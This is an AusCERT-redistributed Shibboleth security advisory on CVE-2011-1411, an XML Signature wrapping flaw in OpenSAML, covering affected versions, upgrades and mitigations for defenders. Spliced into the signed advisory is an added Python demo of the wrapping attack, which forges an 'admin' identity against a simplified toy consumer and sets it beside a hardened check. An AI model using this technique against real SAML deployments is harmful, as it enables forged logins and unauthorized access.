-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2011.0765
                  Shibboleth Security Advisory [25 July 2011]
                                26 July 2011

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Shibboleth
Publisher:         Shibboleth
Operating System:  Windows
                   UNIX variants (UNIX, Linux, OSX)
Impact/Access:     Unauthorised Access -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2011-1411

--------------------------BEGIN INCLUDED TEXT--------------------

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Shibboleth Security Advisory [25 July 2011]

Updated versions of the Shibboleth Project's OpenSAML software in Java
and C++ are available which correct a security issue. This general issue
affects BOTH Identity and Service Provider deployments, so a single
advisory is being issued for both.

For the Identity Provider, this issue is rated as "important". An
unauthenticated remote attacker could leverage the flaw to obtain
unauthorized access to user data under certain circumstances.

For the Service Provider, this issue is rated as "critical", and allows
an unauthenticated remote attacker to access protected resources.

Deployers should take immediate steps as outlined in this advisory and
apply the relevant update(s) at the soonest possible moment.

OpenSAML software is vulnerable to XML Signature wrapping attacks
=======================================================================
The Shibboleth software relies on the OpenSAML libraries to perform
verification of signed XML messages such as attribute queries or SAML
assertions. Both the Java and C++ versions are vulnerable to a so-called
"wrapping attack" that allows a remote, unauthenticated attacker to
craft specially formed messages that can be successfully verified, but
contain arbitrary content.
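The following Python script is an added illustration written for this
redistribution; it is not code from the Shibboleth advisory, from OpenSAML,
or from the researchers credited below. It models the failure mode the
advisory describes, in the Service Provider form (an unsigned login identity
accepted under the guise of a trusted issuer): a consumer verifies a
signature by resolving the ds:Reference ID anywhere in the document, then
picks the saml:Assertion it trusts by position. An attacker who leaves the
genuinely signed Assertion intact but moves it out of the way, and puts an
unsigned Assertion where the consumer looks, passes verification with
attacker-chosen content. XMLDSig canonicalization and the IdP's signing key
are replaced by an HMAC over the referenced element with its enveloped
signature removed; the key, element IDs, issuer and NameID values are
constructed for the demo. The hardened consumer verifies the signature over
the very element whose content it then uses, and rejects anything else.

```python
"""Added example: XML Signature wrapping against a simplified SAML consumer.
HMAC over the referenced element (minus its enveloped signature) stands in
for XMLDSig canonicalization plus the IdP's asymmetric signature."""
import copy
import hashlib
import hmac
import xml.etree.ElementTree as ET

SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
DS = "http://www.w3.org/2000/09/xmldsig#"
for prefix, uri in (("saml", SAML), ("samlp", SAMLP), ("ds", DS)):
    ET.register_namespace(prefix, uri)

IDP_KEY = b"constructed-demo-idp-key"  # stand-in for the IdP's signing key (constructed)


def _canon(el):
    """Serialize el without its enveloped ds:Signature (stand-in for C14N + enveloped transform)."""
    el = copy.deepcopy(el)
    for sig in el.findall(f"{{{DS}}}Signature"):
        el.remove(sig)
    return ET.tostring(el, encoding="utf-8")


def _mac(el):
    return hmac.new(IDP_KEY, _canon(el), hashlib.sha256).hexdigest()


def sign_enveloped(el):
    """Attach a ds:Signature whose Reference points at el by ID, as an IdP does for an Assertion."""
    sig = ET.Element(f"{{{DS}}}Signature")
    ET.SubElement(sig, f"{{{DS}}}Reference", URI="#" + el.get("ID"))
    ET.SubElement(sig, f"{{{DS}}}SignatureValue").text = _mac(el)
    el.insert(1, sig)  # after saml:Issuer, where the schema places it


def build_response(name_id):
    """Constructed sample: a samlp:Response carrying one IdP-signed Assertion for name_id."""
    resp = ET.Element(f"{{{SAMLP}}}Response", ID="_resp1")
    a = ET.SubElement(resp, f"{{{SAML}}}Assertion", ID="_a1")
    ET.SubElement(a, f"{{{SAML}}}Issuer").text = "https://idp.example.org/idp"
    subj = ET.SubElement(a, f"{{{SAML}}}Subject")
    ET.SubElement(subj, f"{{{SAML}}}NameID").text = name_id
    sign_enveloped(a)
    return ET.tostring(resp)


def wrap(legit_xml, attacker_name_id):
    """Attacker: keep the signed Assertion byte-for-byte intact, but park it inside a new,
    unsigned Assertion (under saml:Advice) that sits where the consumer looks for the subject."""
    doc = ET.fromstring(legit_xml)
    signed = doc.find(f"{{{SAML}}}Assertion")
    doc.remove(signed)
    evil = ET.SubElement(doc, f"{{{SAML}}}Assertion", ID="_evil")
    ET.SubElement(evil, f"{{{SAML}}}Issuer").text = signed.find(f"{{{SAML}}}Issuer").text
    subj = ET.SubElement(evil, f"{{{SAML}}}Subject")
    ET.SubElement(subj, f"{{{SAML}}}NameID").text = attacker_name_id
    ET.SubElement(evil, f"{{{SAML}}}Advice").append(signed)
    return ET.tostring(doc)


def _name_id(assertion):
    return assertion.find(f"{{{SAML}}}Subject/{{{SAML}}}NameID").text


def consume_vulnerable(xml_bytes):
    """Verifies the signature by resolving its Reference ID anywhere in the document,
    then selects the Assertion by position. The two lookups can disagree."""
    doc = ET.fromstring(xml_bytes)
    sig = doc.find(f".//{{{DS}}}Signature")
    ref_id = sig.find(f"{{{DS}}}Reference").get("URI")[1:]
    target = next(e for e in doc.iter() if e.get("ID") == ref_id)
    if not hmac.compare_digest(_mac(target), sig.find(f"{{{DS}}}SignatureValue").text):
        raise ValueError("bad signature")
    return _name_id(doc.find(f"{{{SAML}}}Assertion"))  # not necessarily `target`


def consume_hardened(xml_bytes):
    """Uses only the element the signature was verified over: exactly one Assertion
    directly under Response, carrying an enveloped signature whose Reference is itself."""
    doc = ET.fromstring(xml_bytes)
    assertions = doc.findall(f"{{{SAML}}}Assertion")
    if len(assertions) != 1:
        raise ValueError("expected exactly one Assertion under Response")
    a = assertions[0]
    sig = a.find(f"{{{DS}}}Signature")
    if sig is None or sig.find(f"{{{DS}}}Reference").get("URI") != "#" + a.get("ID"):
        raise ValueError("no signature covering this Assertion")
    if not hmac.compare_digest(_mac(a), sig.find(f"{{{DS}}}SignatureValue").text):
        raise ValueError("bad signature")
    return _name_id(a)


def is_rejected(consumer, xml_bytes):
    """True if the consumer refuses the message (raises ValueError)."""
    try:
        consumer(xml_bytes)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    legit = build_response("alice")
    wrapped = wrap(legit, "admin")
    print("vulnerable, legit  :", consume_vulnerable(legit))    # alice
    print("vulnerable, wrapped:", consume_vulnerable(wrapped))  # admin  <- attack succeeds
    print("hardened,   legit  :", consume_hardened(legit))      # alice
    print("hardened,   wrapped:", is_rejected(consume_hardened, wrapped))  # True
```

The signed Assertion is never altered, so any check that only asks "does the
signature verify?" answers yes; the question a consumer has to ask is "which
element did it verify, and is that the element I am about to trust?". This
script does not reproduce the project's actual fix; it only shows the
property a correct consumer needs.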
Identity Provider Vulnerability
-------------------------------
The Identity Provider software relies on the Java version of OpenSAML and
is vulnerable to attacks when XML message signing is used in place of TLS
client authentication for requests such as attribute queries or SAML
artifact resolution. It is also vulnerable to attacks involving signed
AuthnRequest messages, but these are not critical in most deployments.

Some vulnerabilities also exist with use of the extension that supports
delegation of user access, which is not included with the core software,
but available as an add-on.

All versions of the Identity Provider software prior to V2.3.2 ship with
a version of OpenSAML containing the vulnerability.

Some mitigation for these attacks is possible by disabling support for
accepting signed messages. See below for information on this option.

Identity Provider Recommendations
---------------------------------
Upgrade to V2.3.2 of the Identity Provider software to obtain the
corrected version of OpenSAML (V2.5.1), per the normal upgrade process:

https://wiki.shibboleth.net/confluence/display/SHIB2/IdP2Upgrade

If you cannot upgrade immediately, you may mitigate the attack by
disabling support for message signing in the security policies defined
near the bottom of "relying-party.xml" by commenting out all
<security:Rule> elements with xsi:type="samlsec:ProtocolWithXMLSignature"
and restarting your Java container.

Service Provider Vulnerability
------------------------------
The Service Provider software relies on the C++ version of OpenSAML and
is vulnerable to attacks when handling authentication responses from
IdPs. This allows an attacker to subvert the security of the system and
supply an unauthenticated login identity and data under the guise of a
trusted issuer.

All versions of the OpenSAML library prior to V2.4.3 contain this
vulnerability. Note that this refers to the OpenSAML version, *not* the
Shibboleth version.
To determine the version you're using:

- Windows: check the DLL version for saml2_4.dll in your installation's
  lib folder (anything older than saml2_4 is obviously too old)
- Linux/RPM: check the package version using "rpm -qa | grep saml"
- MacPorts: use the "port installed" command

Do not rely on log files for version determination, as this can be
inaccurate and may refer to the version against which the software was
compiled.

There are no known mitigations to prevent this attack apart from
applying this update. Deployers should take immediate steps, and may
wish to disable the use of the SP until the upgrade is done.

Service Provider Recommendations
--------------------------------
Upgrade to V2.4.3 or later of the OpenSAML library and restart the shibd
service/daemon.

Sites relying on official RPM packages or MacPorts can update via the
yum and port commands respectively, but should manually restart shibd.

The updated library has been built into the Windows installation kits
for V2.4.3 of the SP software, and can be found in the "postinstall" ZIP
kits provided for SP update. *Any* version of the SP since 2.0 can be
safely upgraded by unpacking the latest postinstall ZIP over top of the
original software. One exception to this: Windows 2000, which has not
been supported since V2.4 was released.

Note that older Windows installs may not have the latest Microsoft C/C++
runtime libraries present. Installation kits for both 32-bit and 64-bit
runtimes can be found here:

http://shibboleth.net/downloads/service-provider/msredist/

For those using platforms unsupported by the project team directly,
refer to your vendor or package source directly for information on
obtaining the fixed version. If the update from your vendor lags, you
should consider building opensaml from source for your own use as an
interim step.
Credits
-------
Juraj Somorovsky, Andreas Mayer, Meiko Jensen, Florian Kohlar,
Marco Kampmann, Jörg Schwenk
Horst Görtz Institute for IT Security, Ruhr-University Bochum

Thanks to Juraj Somorovsky for working with the developers to explore
and address this issue.

URL for this Security Advisory:
http://shibboleth.internet2.edu/secadv/secadv_20110725.txt

The OpenSAML portion of this advisory has been assigned CVE-2011-1411 by
the National Vulnerability Database.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1411

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (Darwin)

iEYEAREKAAYFAk4s3dkACgkQpXtW80eQXRVTsACeOQckY5CpcHFtKj7wMzAbNRfY
S8EAoLN4EFztTdYMjmnI9yxdGILMu5v3
=J9lb
-----END PGP SIGNATURE-----

--------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to
auscert@auscert.org.au and we will forward your request to the
appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no
control over its content. The decision to follow or act on information
or advice contained in this security bulletin is the responsibility of
each user or organisation, and should be considered in accordance with
your organisation's site policies and procedures. AusCERT takes no
responsibility for consequences which may arise from following or acting
on information or advice contained in this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made.
If downloading at a later date, it is recommended that the bulletin is
retrieved directly from the author's website to ensure that the
information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved
from:

http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBTi32v+4yVqjM2NGpAQICDhAAsNPCM3G4Dd5ZQhHfC9dZYYbbCJJxtCMh
WQoHiTQzwa/79mNmeWOaXyklcX45ZYbXP9AMkpSp/Vnik2nQ4SCWp0xcN84W1qWV
75R1cu2rO0sivBJTwwYG/KbQscNV6mRRgqXANMJAGIPrOQtAJKrWtOTvTjT4gwQY
5TFXbyIxkaXd54bUrb4yXBufv7l5lfv/Q07zFwYM9Bv0cg/DkeqnzxB7Nay+WSkS
ex+smHVKTvrdrVveqcCwoE8IIA2jLmxENlj5mkMPWpnA3MnTRzdNAFfeYkJnoKo2
ZCM1ekLjJkUsYBtBiwkHdR5NVJVk1nt3Md8kn8rPoF3w99hqtzpU5rVyirB0mBRz
DG/Xu6At8K5pyea36OygR9R4Xl6uT4/CsRFXEo2vkG8TOqEYVhpPhURTWmQ/TSZ8
kK4nd64Y5LZ4V0BsyhiL0065mfsagujngl9vdkfTFmJi2PgJjqXWHAb+LZ9hmQ73
YOF69xPry5TQPgiREgnTeRPX8wS/pKw7iKGwBw0sttQuG4LJBmlWgd5UnTLkiQtH
RrrqDNiTnjmgQKeHnrQgxi/EE0aJRyyxeCt5lwbMKKS8HYIVe4lO08YRM+VcVRk7
I1fF8RdsW8Zu+s0/kd0M+YTe1WT/MWTf/6MxoiYv2Y4aorZKaxZAeuYv8iAqOeyH
+CAFL6vlvng=
=RxmJ
-----END PGP SIGNATURE-----